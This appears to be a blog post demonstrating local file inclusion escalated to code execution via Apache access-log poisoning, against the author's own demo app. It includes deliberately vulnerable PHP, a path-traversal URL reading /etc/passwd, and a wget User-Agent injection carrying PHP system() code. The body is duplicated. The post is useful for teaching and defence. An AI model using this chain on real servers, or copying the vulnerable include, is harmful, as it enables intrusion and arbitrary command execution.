Based on http://eng.xakep.ru/link/50643/, I created a demo app to play with this. The vulnerable PHP code looks like:
<?php
$file = $_GET['id'];
echo $file;
if (file_exists($file))
include $file;
?>
The following URL demostrates a local file include:
http://192.168.1.102/animals/animals.php?id=../../../../etc/passwd
An attacker can control various parts of the web server log that he generates. For example the -U flag to wget sets a custom User-Agent header:
wget -U "<?php system('touch /tmp/dennis'); ?>" 192.168.1.102
And it generates the following Apache access_log entry:
192.168.1.102 - - [06/Jan/2010:20:15:04 -0600] "GET / HTTP/1.0" 200 2212 "-" "<?php system('touch /tmp/dennis'); ?>"
If we request the following URL:
http://192.168.1.102/animals/animals.php?id=../../../../var/www/logs/access_log *
* the path to Apache's access_log varies per configuration.
animals.php's include statement includes the access_log which happens to have a log entry with a User-Agent set to a snippet of attacker controlled PHP code:
dennis@ipa:~$ ls -l /tmp/dennis
-rw-r--r-- 1 www wheel 0 Jan 6 20:26 /tmp/dennis
<?php
$file = $_GET['id'];
echo $file;
if (file_exists($file))
include $file;
?>
The following URL demostrates a local file include:
http://192.168.1.102/animals/animals.php?id=../../../../etc/passwd
An attacker can control various parts of the web server log that he generates. For example the -U flag to wget sets a custom User-Agent header:
wget -U "<?php system('touch /tmp/dennis'); ?>" 192.168.1.102
And it generates the following Apache access_log entry:
192.168.1.102 - - [06/Jan/2010:20:15:04 -0600] "GET / HTTP/1.0" 200 2212 "-" "<?php system('touch /tmp/dennis'); ?>"
If we request the following URL:
http://192.168.1.102/animals/animals.php?id=../../../../var/www/logs/access_log *
* the path to Apache's access_log varies per configuration.
animals.php's include statement includes the access_log which happens to have a log entry with a User-Agent set to a snippet of attacker controlled PHP code:
dennis@ipa:~$ ls -l /tmp/dennis
-rw-r--r-- 1 www wheel 0 Jan 6 20:26 /tmp/dennis
More on this at Micro PHP LFI Backdoor
ReplyDelete